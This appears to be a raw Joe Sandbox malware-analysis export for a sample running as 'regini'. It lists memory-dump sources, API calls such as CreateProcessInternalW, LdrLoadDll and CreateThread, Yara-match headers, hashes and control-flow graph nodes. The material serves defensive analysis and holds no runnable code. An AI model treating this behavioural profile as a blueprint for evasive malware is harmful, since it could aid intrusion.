                                                                                                              • Opcode Fuzzy Hash: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
                                                                                                              • Instruction Fuzzy Hash: 4D900221246442525A46B1594404907400697E02417A5C016A141CB70C85279D56E621
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                                              • Instruction ID: 0adc8368fc2c5423924803c49ed29fbf967981449dade7367c9a97926c91c0ea
                                                                                                              • Opcode Fuzzy Hash: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                                              • Instruction Fuzzy Hash: 6E90023120540513D61271594504B07000987D0241FA5C416A042C778D96578E52B121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                                              • Instruction ID: 0e236aa776d6c721add0c2dcf999fa85db210998c860baa00c136f647343eb3a
                                                                                                              • Opcode Fuzzy Hash: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                                              • Instruction Fuzzy Hash: 3590022921740102D68171595408A0B000587D1202FA5D419A001D778CC9168D696321
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 416 4b0c49-4b0c5a 417 4b0c8c-4b0c91 416->417 418 4b0c5c-4b0c7b 416->418 421 4b0c9d-4b0ca7 417->421 422 4b0c93-4b0c9b 417->422 419 4b0ccf-4b0cd5 call 4cb620 418->419 420 4b0c7d-4b0c8b 418->420 427 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 419->427 420->417 426 4b0c45 420->426 423 4b0ca9-4b0cb1 421->423 424 4b0ccd-4b0cd2 421->424 422->421 424->427 428 4b0cd5 call 4cb620 424->428 426->416 437 4b0d4a-4b0d50 427->437 438 4b0d2c-4b0d3b PostThreadMessageW 427->438 428->427 438->437 439 4b0d3d-4b0d47 438->439 439->437
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004B0D37
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 440 4b0c09-4b0c3a 441 4b0c9f-4b0ca7 440->441 442 4b0c3c-4b0c44 440->442 443 4b0ca9-4b0cb1 441->443 444 4b0ccd-4b0cd2 441->444 442->441 445 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 444->445 446 4b0cd5 call 4cb620 444->446 455 4b0d4a-4b0d50 445->455 456 4b0d2c-4b0d3b PostThreadMessageW 445->456 446->445 456->455 457 4b0d3d-4b0d47 456->457 457->455
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 0-2814820216

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 458 4b0cb4-4b0cd2 461 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 458->461 462 4b0cd5 call 4cb620 458->462 471 4b0d4a-4b0d50 461->471 472 4b0d2c-4b0d3b PostThreadMessageW 461->472 462->461 472->471 473 4b0d3d-4b0d47 472->473 473->471
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004B0D37
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 474 4b0cc0-4b0cd2 476 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 474->476 477 4b0cd5 call 4cb620 474->477 486 4b0d4a-4b0d50 476->486 487 4b0d2c-4b0d3b PostThreadMessageW 476->487 477->476 487->486 488 4b0d3d-4b0d47 487->488 488->486
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004B0D37
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 004C3ABB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: RWP($$wininet.dll
                                                                                                              • API String ID: 3472027048-4161513034
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A9EC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID: W
                                                                                                              • API String ID: 2422867632-655174618
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004B44E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004B44E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction ID: b6b3b15f0a7b543bd6de3c2854067cc6ec7de4ea655369fc2fa624f2252fe1a1
                                                                                                              • Opcode Fuzzy Hash: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction Fuzzy Hash: 060152B9D0010DABDB10DBE1DC42FDEB3789B54308F004199E90997242F635EB14CB55
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,004B826E,00000010,?,?,?,00000044,?,00000010,004B826E,?,00000000,?), ref: 004C9900
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              • Opcode ID: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                                                                              • Instruction ID: 4799ae41ce386b34c61ca1fc9e62a6ab15dfaac686e23e8c6451c2733d9771f3
                                                                                                              • Opcode Fuzzy Hash: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                                                                              • Instruction Fuzzy Hash: 9001C4B6200208BBDB44DE99DC81EDB77ADEF8C714F108108FA09A3240D630F8518BA4
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A9EC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 01d431bbaebfac31586073470610e1a0683833a659bc116b844b43b4e7ef8420
                                                                                                              • Instruction ID: 72e087982b8702016d2f4ac34a93387d25cb83bcb50d4dcdf4dd71bb3eaf5f1c
                                                                                                              • Opcode Fuzzy Hash: 01d431bbaebfac31586073470610e1a0683833a659bc116b844b43b4e7ef8420
                                                                                                              • Instruction Fuzzy Hash: D6F0657734020436E26062EE9C03FD7B79C8B81765F14001AF70CEA2C1E995B90186ED
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4F2B6C06,00000007,00000000,00000004,00000000,004B3CD7,000000F4), ref: 004C984F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction ID: 5846e53e32e70fc34b7ac3d3e7e5bceb4581112c63087e8d5e3fbe9a44361bd8
                                                                                                              • Opcode Fuzzy Hash: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction Fuzzy Hash: 78E092752002047FC610EE99DC45FEB77ACEFC9714F008019F908A7241DA30BC118BB8
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004B44E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                                                                              • Instruction ID: 66756bbbf33e89bbbaa2cf9891dbaf133bd9fe6485b1e11878f79a8d271cca1e
                                                                                                              • Opcode Fuzzy Hash: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                                                                              • Instruction Fuzzy Hash: 05E05560C0818C7BDB10CAB449152D8FBA0CFA2214F0446DEC99C53003E1344D258313
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(004B1949,?,004C5EDB,004B1949,004C55DF,004C5EDB,?,004B1949,004C55DF,00001000,?,?,00000000), ref: 004C97FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                                                                              • Instruction ID: fd13a679f9ebb39cd5469c71ba5c6e85584de5b715258866f9f6469f4de63090
                                                                                                              • Opcode Fuzzy Hash: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                                                                              • Instruction Fuzzy Hash: 4CE06DB52002087BD610EF59DC45FEB37ADEFC9714F404409F908A7242CA70B8118BB9
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,004B1C50,004C7F1F,004C55DF,004B1C16), ref: 004B80D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: dc60f4255a1b059cff2eb29913a513c57fc59de4954b1290f92a9f66e951121b
                                                                                                              • Instruction ID: 00b4eff6e4873d19d3678297fe9102c4ce213ce0a70fdbbba7431a83e6efe4f5
                                                                                                              • Opcode Fuzzy Hash: dc60f4255a1b059cff2eb29913a513c57fc59de4954b1290f92a9f66e951121b
                                                                                                              • Instruction Fuzzy Hash: 66E086765401042FE750EAB4CC47FA63B695B51744F05455DF90CEB693E968F5008A58
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,004B1C50,004C7F1F,004C55DF,004B1C16), ref: 004B80D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 822d04b9f00d6765cb2fc4bf3cea851c7fc5ce36d9bcb841856529da519ea3b3
                                                                                                              • Instruction ID: 46af12d776f8d2042851ecf642cebbab55d2ad8e1105fd535d1d58b8806483c1
                                                                                                              • Opcode Fuzzy Hash: 822d04b9f00d6765cb2fc4bf3cea851c7fc5ce36d9bcb841856529da519ea3b3
                                                                                                              • Instruction Fuzzy Hash: E7D05EB52402043BE650B6A58C07FA7369C4B15794F0544A9BE0CE76C3FC68F50086AD
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE ref: 004B82DC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                                              • Instruction ID: 9ddbb1af3b1bf40982f229f846e5c4864cf6caeea9649e615b081cb75f1c3975
                                                                                                              • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                                              • Instruction Fuzzy Hash: D4C08C3922080804EB2809FC78482E3334C9B8233CB140E96F82CD99E4D52A9CA7D02C
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 82cb577cee538915e5fcf5625e32fb5726021a5f1710774c92489cb687b0c52f
                                                                                                              • Instruction ID: 0b624b3ff8606b0bb1a456525212171cc2439517c064e67ac85d4ed0f9655b42
                                                                                                              • Opcode Fuzzy Hash: 82cb577cee538915e5fcf5625e32fb5726021a5f1710774c92489cb687b0c52f
                                                                                                              • Instruction Fuzzy Hash: 52B09B729055C5C5DF12E7604A0DB177A006BD0702F25C065D2034761E4739C9D1F175
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561059797.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1fa6f9d64e6495de7549c19792e16550921b0d2c8c0869c249b6bf00bfe131d4
                                                                                                              • Instruction ID: 9b4a005368fde137e27b2587b293d4c435b71ba910e4194a537361fc173a74d1
                                                                                                              • Opcode Fuzzy Hash: 1fa6f9d64e6495de7549c19792e16550921b0d2c8c0869c249b6bf00bfe131d4
                                                                                                              • Instruction Fuzzy Hash: 6D41E67061DB0D4FD368BF6890816B6B3E3FB85300F90496DD88AC3652EB74E8868785
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561059797.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3558027158
                                                                                                              • Opcode ID: 90a20e84085b95dfc8f696e2e7f90bcc2234ec38efdafe73100f3827129103f3
                                                                                                              • Instruction ID: 65901df1b1f4045f044689f71ae5c7b97cd72341af80dd103430d70935685973
                                                                                                              • Opcode Fuzzy Hash: 90a20e84085b95dfc8f696e2e7f90bcc2234ec38efdafe73100f3827129103f3
                                                                                                              • Instruction Fuzzy Hash: 20915EF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 7a827ed9f794db57c58ecd4706a66a39f82b8240c8d4fc81e75c88d29ba7baf1
                                                                                                              • Instruction ID: 4d4391b08221df0dbb91add03ed36a3bd60e664e03069036c4d029841e9d1cdb
                                                                                                              • Opcode Fuzzy Hash: 7a827ed9f794db57c58ecd4706a66a39f82b8240c8d4fc81e75c88d29ba7baf1
                                                                                                              • Instruction Fuzzy Hash: 3651D8B6A00116EFDF11DB5888949BEF7B8BF08700B508269E8AAD7741D334DE44CBE0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                                              • Instruction ID: c8f2eb597b586735d897f7d55e6ba94963f11143a7e693b8f862f39286aa9881
                                                                                                              • Opcode Fuzzy Hash: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                                              • Instruction Fuzzy Hash: 10510471A80665ABDB20CF9CC8909BEB7B9EB44204B04D459EA97C7641EB74DE08CB60
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02DE4725
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02DE46FC
                                                                                                              • Execute=1, xrefs: 02DE4713
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02DE4742
                                                                                                              • ExecuteOptions, xrefs: 02DE46A0
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02DE4655
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02DE4787
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
